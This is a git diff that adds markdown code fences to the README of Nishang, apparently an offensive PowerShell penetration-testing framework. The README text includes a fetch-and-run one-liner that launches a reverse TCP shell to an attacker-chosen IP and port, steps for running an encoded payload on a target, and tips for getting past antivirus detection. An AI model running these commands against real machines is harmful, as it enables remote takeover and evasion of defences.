diff --git a/README.md b/README.md index 366fb7e..741ff31 100644 --- a/README.md +++ b/README.md @@ -7,25 +7,33 @@ By [nikhil_mitt](https://twitter.com/nikhil_mitt) Import all the scripts in the current PowerShell session (PowerShell v3 onwards). +```powershell PS C:\nishang> Import-Module .\nishang.psm1 +``` Use the individual scripts with dot sourcing. +```powershell PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1 PS C:\nishang> Get-Information +``` To get help about any script or function, use: +```powershell PS C:\nishang> Get-Help [scriptname] -full +``` Note that the help is available for the function loaded after running the script and not the script itself since version 0.3.8. In all cases, the function name is same as the script name. For example, to see the help about Get-WLAN-Keys.ps1, use +```powershell PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1 PS C:\nishang> Get-Help Get-WLAN-Keys -Full +``` #### Anti Virus Nishang scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory: @@ -33,16 +41,20 @@ Nishang scripts are flagged by many Anti Viruses as malicious. The scrripts on a Method 1. Use the in-memory dowload and execute: Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with same name in the current PowerShell session. +```powershell powershell iex (New-Object Net.WebClient).DownloadString('http:///Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.] +``` -Method 2. Use the -encodedcommand (or -e) parameter of PowerShell -All the scripts in Nishang export a function with same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a function call (without quotes) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]". +Method 2. Use the `-encodedcommand` (or `-e`) parameter of PowerShell +All the scripts in Nishang export a function with same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a function call (without quotes) `"Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]"`. Encode the scrript using Invoke-Encode from Nishang: +```powershell PS C:\nishang> . \nishang\Utility\Invoke-Encode PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand +``` Encoded data written to .\encoded.txt @@ -50,7 +62,9 @@ Encoded command written to .\encodedcommand.txt From above, use the encoded script from encodedcommand.txt and run it on a target where commands could be executed (a remote shell, meterpreter native shell, a web shell etc.). Use it like below: +```powershell C:\Users\target> powershell -e [encodedscript] +``` If the scripts still get detected changing the function and parameter names and removing the help content will help.